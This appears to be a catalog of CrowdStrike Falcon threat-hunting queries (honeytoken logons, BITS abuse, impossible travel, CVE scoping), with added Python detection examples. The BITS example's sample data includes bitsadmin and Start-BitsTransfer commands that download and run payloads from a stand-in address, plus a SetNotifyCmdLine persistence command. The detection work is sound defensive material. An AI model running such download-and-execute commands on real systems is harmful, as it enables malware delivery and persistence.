EXPLORE DETECTIONS
Honeytoken Account Logon Activity
This query detects logon activity associated with a honeytoken account. Honeytokens are decoy accounts designed to lure attackers, and any activity on them is a strong indicator of compromise.

### Honeytoken Account Access Detection

This use case is designed to generate an alert when any activity involving a designated **honeytoken account** is observed. Honeytokens serve as decoys: they are accounts that appear valuable to an attacker but have no legitimate purpose and are heavily monitored. Any interaction with them is highly indicative of malicious activity.

**Key Objectives:**

- **Lure Attackers**: Create accounts that mimic administrator or service accounts to attract adversarial engagement.
- **High-Fidelity Alerts**: Since these accounts have no legitimate use, any logon event is a high-confidence signal of a breach.
- **Monitor and Safeguard**: Apply Identity Protection policies to monitor these accounts without granting them any actual permissions, making them safe and effective traps.

---

#### Query Breakdown:

1. **`#event_simpleName=/UserLogon.*/i`**
   - This line filters for all logon-related events captured by CrowdStrike Falcon (the pattern is unanchored and case-insensitive, so it also covers failed-logon events whose names begin with `UserLogon`). It serves as the primary data source for the detection.
2. **`| UserSid = /S-1-5-21-\d*-\d*-\d*-500/i`**
   - This filters the logon events by Security Identifier (SID). A SID of the form `S-1-5-21-<domain or machine identifier>-500` carries the well-known relative identifier (RID) 500, which is the built-in Administrator account: the domain Administrator when the prefix is the domain's SID, or the local Administrator when it is a machine's SID. As written, the pattern is therefore a placeholder that matches every built-in Administrator logon.
   - **Crucially**, this value must be replaced with the actual SID(s) of your organization's designated honeytoken accounts. Note also that the regular expression is unanchored, so it would also match any RID that merely begins with `500` (for example `-5001`); anchoring it (`/^S-1-5-21-\d+-\d+-\d+-500$/i`) keeps the match exact.

For more details on creating and managing honeytokens within Falcon Identity Protection, please refer to the official CrowdStrike documentation:

- [Honeytokens within Falcon Identity Protection](https://supportportal.crowdstrike.com/s/article/ka16T000001MfykQAC)
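As an added illustration (not code from this page or from CrowdStrike), the following Python runs the two stages of the query over a handful of constructed UserLogon-family records. It shows that the RID-500 placeholder, being unanchored, also matches a RID of 5001, that anchoring the expression fixes this, and what the second stage looks like once the placeholder is replaced by an exact list of honeytoken SIDs. Every hostname, user and SID in the sample is constructed, and the honeytoken SID is hypothetical.

```python
import re

# Constructed sample records standing in for Falcon UserLogon-family telemetry (not real data).
# The honeytoken SID below is hypothetical; replace it with your own honeytoken SID(s).
HONEYTOKEN_SIDS = {"S-1-5-21-1111-2222-3333-1604"}

SAMPLE_EVENTS = [
    {"event_simpleName": "UserLogon", "ComputerName": "DC01", "UserName": "Administrator",
     "UserSid": "S-1-5-21-1111-2222-3333-500"},
    {"event_simpleName": "UserLogon", "ComputerName": "FS01", "UserName": "svc_backup",
     "UserSid": "S-1-5-21-1111-2222-3333-5001"},
    {"event_simpleName": "UserLogonFailed2", "ComputerName": "SQL02", "UserName": "ht_sqladmin",
     "UserSid": "S-1-5-21-1111-2222-3333-1604"},
    {"event_simpleName": "ProcessRollup2", "ComputerName": "SQL02", "UserName": "ht_sqladmin",
     "UserSid": "S-1-5-21-1111-2222-3333-1604"},
    {"event_simpleName": "UserLogon", "ComputerName": "WS17", "UserName": "jdoe",
     "UserSid": "S-1-5-21-1111-2222-3333-1105"},
]

# Stage 1 of the query: #event_simpleName=/UserLogon.*/i (unanchored, case-insensitive).
LOGON_EVENT = re.compile(r"UserLogon.*", re.IGNORECASE)

# Stage 2 as written on the page: the RID-500 placeholder, also unanchored.
PLACEHOLDER_SID = re.compile(r"S-1-5-21-\d*-\d*-\d*-500", re.IGNORECASE)
# Same intent, anchored so that only an exact RID 500 matches.
ANCHORED_SID = re.compile(r"^S-1-5-21-\d+-\d+-\d+-500$", re.IGNORECASE)


def logon_events(events):
    """Keep only events whose name matches /UserLogon.*/i (UserLogon, UserLogonFailed2, ...)."""
    return [e for e in events if LOGON_EVENT.search(e["event_simpleName"])]


def sids_matching(events, pattern):
    """Return the UserSid values of logon events that the given SID pattern matches."""
    return [e["UserSid"] for e in logon_events(events) if pattern.search(e["UserSid"])]


def honeytoken_hits(events, honeytoken_sids=HONEYTOKEN_SIDS):
    """Logon events whose SID is one of the designated honeytoken SIDs (exact, case-insensitive)."""
    wanted = {s.upper() for s in honeytoken_sids}
    return [
        {"ComputerName": e["ComputerName"], "UserName": e["UserName"],
         "UserSid": e["UserSid"], "event_simpleName": e["event_simpleName"]}
        for e in logon_events(events)
        if e["UserSid"].upper() in wanted
    ]


if __name__ == "__main__":
    print("placeholder, unanchored:", sids_matching(SAMPLE_EVENTS, PLACEHOLDER_SID))
    print("placeholder, anchored:  ", sids_matching(SAMPLE_EVENTS, ANCHORED_SID))
    for hit in honeytoken_hits(SAMPLE_EVENTS):
        print("HONEYTOKEN ALERT:", hit)
```

The failed logon against the honeytoken is reported because stage 1 matches every `UserLogon*` event name, while the `ProcessRollup2` record for the same SID is dropped by that stage; a honeytoken alert should fire on failed attempts too, so this is the behaviour you want.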
Hunt for a file name
Hunt for specific Command Line Activity
Hunting Bitsadmin usage
This query implements a multi-hypothesis threat-hunting workflow to detect abuse of the Windows Background Intelligent Transfer Service (BITS). It uses a case statement to classify incoming telemetry into four distinct detection hypotheses, with the first matching hypothesis winning. H1 catches direct execution of bitsadmin.exe with suspicious command-line arguments (such as /transfer, /addfile, /download, /SetNotifyCmdLine, or URLs) while excluding legitimate parent processes such as svchost.exe and msiexec.exe. H2 detects PowerShell-based BITS abuse by scanning script block logging and command history events for cmdlets like Start-BitsTransfer or direct COM object invocation (BITS.IBackgroundCopyManager) combined with network-related parameters. H3 focuses specifically on BITS persistence mechanisms by flagging commands that set notification callbacks (SetNotifyCmdLine), retry delays, or timeout values, excluding legitimate Windows Update activity. H4 identifies proxy reconnaissance via bitsadmin /getieproxy, a technique attackers use to discover proxy configurations before exfiltrating data.
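As an added example (not the page's query and not CrowdStrike code), the Python below implements the four hypotheses as an ordered case statement and runs them over constructed process and PowerShell telemetry. The Falcon event and field names (ProcessRollup2 with CommandLine, ImageFileName and ParentBaseFileName; ScriptControlScanTelemetry with ScriptContent; CommandHistory with CommandHistory) are assumptions to check against your own schema, the specific bitsadmin switches used for "retry delays or timeout values" (/SetMinRetryDelay, /SetNoProgressTimeout), the "network-related parameters" for H2 and the Windows Update exclusion by hostname are choices made here, and every command line and address in the sample is constructed.

```python
import re

# Constructed sample telemetry (not real data); event/field names are assumptions, see lead-in.
SAMPLE_EVENTS = [
    {"event_simpleName": "ProcessRollup2", "ImageFileName": r"C:\Windows\System32\bitsadmin.exe",
     "ParentBaseFileName": "cmd.exe",
     "CommandLine": r"bitsadmin /transfer job1 /download /priority high http://203.0.113.10/a.exe C:\Users\Public\a.exe"},
    {"event_simpleName": "ProcessRollup2", "ImageFileName": r"C:\Windows\System32\bitsadmin.exe",
     "ParentBaseFileName": "svchost.exe",
     "CommandLine": r"bitsadmin /transfer wu /download https://download.windowsupdate.com/x.cab C:\Windows\Temp\x.cab"},
    {"event_simpleName": "ScriptControlScanTelemetry",
     "ScriptContent": r"Start-BitsTransfer -Source http://203.0.113.10/p.ps1 -Destination C:\Temp\p.ps1"},
    {"event_simpleName": "CommandHistory", "CommandHistory": "Get-BitsTransfer | Format-List"},
    {"event_simpleName": "ProcessRollup2", "ImageFileName": r"C:\Windows\System32\bitsadmin.exe",
     "ParentBaseFileName": "msiexec.exe",
     "CommandLine": r'bitsadmin /SetNotifyCmdLine job1 C:\Windows\System32\cmd.exe "/c C:\Users\Public\a.exe"'},
    {"event_simpleName": "ProcessRollup2", "ImageFileName": r"C:\Windows\System32\bitsadmin.exe",
     "ParentBaseFileName": "cmd.exe", "CommandLine": "bitsadmin /SetMinRetryDelay job1 60"},
    {"event_simpleName": "ProcessRollup2", "ImageFileName": r"C:\Windows\System32\bitsadmin.exe",
     "ParentBaseFileName": "cmd.exe", "CommandLine": "bitsadmin /getieproxy LOCALSYSTEM"},
    {"event_simpleName": "ProcessRollup2", "ImageFileName": r"C:\Windows\System32\bitsadmin.exe",
     "ParentBaseFileName": "cmd.exe", "CommandLine": "bitsadmin /list /allusers"},
]

URL = re.compile(r"https?://", re.IGNORECASE)
H1_ARGS = re.compile(r"/(transfer|addfile|download|SetNotifyCmdLine)\b", re.IGNORECASE)
H1_EXCLUDED_PARENTS = {"svchost.exe", "msiexec.exe"}
H2_BITS = re.compile(r"Start-BitsTransfer|BITS\.IBackgroundCopyManager", re.IGNORECASE)
H2_NETWORK = re.compile(r"https?://|-Source\b|-TransferType\b", re.IGNORECASE)   # assumed network params
H3_PERSISTENCE = re.compile(r"/(SetNotifyCmdLine|SetMinRetryDelay|SetNoProgressTimeout)\b", re.IGNORECASE)
WINDOWS_UPDATE = re.compile(r"windowsupdate\.com|update\.microsoft\.com", re.IGNORECASE)  # assumed exclusion
H4_PROXY = re.compile(r"/getieproxy\b", re.IGNORECASE)
SCRIPT_EVENTS = {"ScriptControlScanTelemetry", "CommandHistory"}


def command_text(event):
    """The command-like string of an event, whichever field carries it."""
    return event.get("CommandLine") or event.get("ScriptContent") or event.get("CommandHistory") or ""


def classify(event):
    """Return the first hypothesis that matches (case-statement semantics), or None."""
    name = event.get("event_simpleName", "")
    text = command_text(event)
    is_bitsadmin = event.get("ImageFileName", "").lower().endswith("bitsadmin.exe")
    parent = event.get("ParentBaseFileName", "").lower()

    if is_bitsadmin and parent not in H1_EXCLUDED_PARENTS and (H1_ARGS.search(text) or URL.search(text)):
        return "H1 bitsadmin suspicious arguments"
    if name in SCRIPT_EVENTS and H2_BITS.search(text) and H2_NETWORK.search(text):
        return "H2 PowerShell BITS abuse"
    if is_bitsadmin and H3_PERSISTENCE.search(text) and not WINDOWS_UPDATE.search(text):
        return "H3 BITS persistence"
    if is_bitsadmin and H4_PROXY.search(text):
        return "H4 proxy reconnaissance"
    return None


def hunt(events):
    """Classify every event and keep those that hit a hypothesis, in input order."""
    results = []
    for event in events:
        hypothesis = classify(event)
        if hypothesis:
            results.append({"hypothesis": hypothesis, "command": command_text(event)})
    return results


if __name__ == "__main__":
    for r in hunt(SAMPLE_EVENTS):
        print(f"{r['hypothesis']:32s} {r['command']}")
```

Note the ordering effect of the case statement: the /SetNotifyCmdLine command launched by msiexec.exe is not reported by H1 (excluded parent) but still surfaces under H3, while the svchost.exe-parented Windows Update transfer matches nothing, which is the intended exclusion.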
Hunting EDR Freeze
Based on the default command-line switch behavior found in the EDR-Freeze open-source project: https://github.com/TwoSevenOneT/EDR-Freeze?tab=readme-ov-file
Identify Linux Systems Vulnerable to CVE-2025-1146 with Last Logged-On User Information
The query below looks for Linux systems (Linux hosts, Kubernetes nodes, and containers) that need to be updated against CVE-2025-1146. It is based on the OsVersionInfo event, which is generated every 24 hours, at sensor start, and at sensor update. It attempts to merge in logon events with LogonType 2 and 10 to determine the last logged-on user. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/CVE-2025-1146%20System%20Scoping%20(OsVersionInfo%20with%20Logon%20Data).md)
Identify Shadow SaaS
This query identifies SaaS services supported by Falcon Shield and helps detect which SaaS products are actively used within the environment.
Identity Protection - Average Cloud Response Time
Average time (in seconds) the cloud service takes to resolve entity information (e.g., from SID/GUID). Latency above 3 seconds may cause intermittent issues; above 4 seconds can lead to recurring timeouts.
Impossible Travel Time Azure
Traces logins from two different countries with impossible travel times between consecutive logins per identity. Reference: [GitHub Aamir-Muhammad/CrowdStrike-Queries](https://github.com/Aamir-Muhammad/CrowdStrike-Queries/blob/main/Hunting-Queries/Impossible-Travel-Time-Azure.md)
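As an added worked example (not the referenced query and not code from its author), the Python below applies the same idea to constructed Azure-style sign-in records: per identity, sort sign-ins by time, look at each consecutive pair whose countries differ, and flag the pair when the great-circle distance divided by the elapsed time exceeds a plausible travel speed. It assumes the sign-in log is enriched with latitude/longitude (the page only mentions countries), uses 900 km/h as an assumed threshold, and also shows the generalization of dropping the country-change requirement so that same-country impossible travel is caught too. All users, times and locations in the sample are constructed.

```python
from collections import defaultdict
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

EARTH_RADIUS_KM = 6371.0

# Constructed sample sign-ins (not real data). Coordinates are assumed to come from the
# sign-in log's location enrichment; the country code is what the page's query compares.
SAMPLE_SIGNINS = [
    {"user": "alice@example.com", "time": "2024-05-01T08:00:00Z", "country": "US", "city": "New York", "lat": 40.7128, "lon": -74.0060},
    {"user": "alice@example.com", "time": "2024-05-01T09:30:00Z", "country": "DE", "city": "Frankfurt", "lat": 50.1109, "lon": 8.6821},
    {"user": "bob@example.com", "time": "2024-05-01T07:00:00Z", "country": "GB", "city": "London", "lat": 51.5074, "lon": -0.1278},
    {"user": "bob@example.com", "time": "2024-05-01T16:30:00Z", "country": "FR", "city": "Paris", "lat": 48.8566, "lon": 2.3522},
    {"user": "carol@example.com", "time": "2024-05-01T10:15:00Z", "country": "US", "city": "Boston", "lat": 42.3601, "lon": -71.0589},
    {"user": "carol@example.com", "time": "2024-05-01T10:00:00Z", "country": "US", "city": "New York", "lat": 40.7128, "lon": -74.0060},
]


def parse_time(ts):
    """Parse an ISO-8601 UTC timestamp such as 2024-05-01T08:00:00Z."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points in kilometres."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def required_speed_kmh(prev, cur):
    """Speed needed to get from the previous sign-in location to the current one in the elapsed time."""
    hours = (parse_time(cur["time"]) - parse_time(prev["time"])).total_seconds() / 3600.0
    distance = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
    if hours <= 0:                       # same-second sign-ins from different places are impossible
        return float("inf") if distance > 0 else 0.0
    return distance / hours


def find_impossible_travel(signins, max_speed_kmh=900.0, require_country_change=True):
    """Flag consecutive sign-ins per identity that would require travelling faster than max_speed_kmh."""
    by_user = defaultdict(list)
    for s in signins:
        by_user[s["user"]].append(s)

    findings = []
    for user, rows in by_user.items():
        rows = sorted(rows, key=lambda r: parse_time(r["time"]))   # log order is not time order
        for prev, cur in zip(rows, rows[1:]):
            if require_country_change and prev["country"] == cur["country"]:
                continue                                             # the page's query compares countries
            speed = required_speed_kmh(prev, cur)
            if speed > max_speed_kmh:
                findings.append({
                    "user": user,
                    "from": f"{prev['city']}, {prev['country']} @ {prev['time']}",
                    "to": f"{cur['city']}, {cur['country']} @ {cur['time']}",
                    "speed_kmh": round(speed),
                })
    return findings


if __name__ == "__main__":
    for f in find_impossible_travel(SAMPLE_SIGNINS):
        print(f)
    print("without country-change requirement:")
    for f in find_impossible_travel(SAMPLE_SIGNINS, require_country_change=False):
        print(f)
```

With the country-change requirement, only the New York to Frankfurt pair (about 6,200 km in 90 minutes) is flagged; London to Paris over nine and a half hours is ordinary travel. Dropping the requirement additionally catches the New York to Boston pair 15 minutes apart, which a country-only comparison cannot see.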
Inspected LDAP / Kerberos / DCE/RPC Traffic
Shows inspected traffic requests over time on the selected domain controller
Installed Browser Extensions (Aggregate by Extension)
This query will output a table with all installed browser extensions.
Installed Browser Extensions (Hunt Extension Name)
This query will output a table with all installed browser extensions. Replace "vpn" with the string you want to hunt for.